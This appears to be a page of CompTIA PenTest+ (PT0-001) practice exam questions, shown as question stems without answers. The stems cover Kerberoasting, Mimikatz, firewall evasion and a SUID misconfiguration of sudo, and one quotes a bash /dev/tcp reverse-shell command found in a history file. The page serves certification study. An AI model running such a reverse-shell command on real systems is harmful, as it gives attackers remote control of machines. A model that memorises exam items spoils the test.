Exam Logo

Comptia (PT0-001) Exam Questions And Answers page 17

In which of the following scenarios would a tester perform a Kerberoasting attack?
Attacks and Exploits Penetration Testing Tools
Joe, an attacker, intends to transfer funds discreetly from a victim s account to his own. Which of the following URLs can he use to accomplish this attack?
Attacks and Exploits Penetration Testing Tools
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
Attacks and Exploits Penetration Testing Tools
Joe, a penetration tester, was able to exploit a web application behind a firewall. He is trying to get a reverse shell back to his machine, but the firewall blocks the outgoing traffic. Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?
Attacks and Exploits Penetration Testing Tools
The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo

Which of the following issues may be exploited now?
Attacks and Exploits Penetration Testing Tools
The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?
Attacks and Exploits Penetration Testing Tools
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Choose two.)
Planning and Scoping Information Gathering and Vulnerability Identification
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?
Attacks and Exploits Penetration Testing Tools
When calculating the sales price of a penetration test to a client, which of the following is the MOST important aspect to understand?
Penetration Testing Tools Reporting and Communication
When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?
Planning and Scoping Attacks and Exploits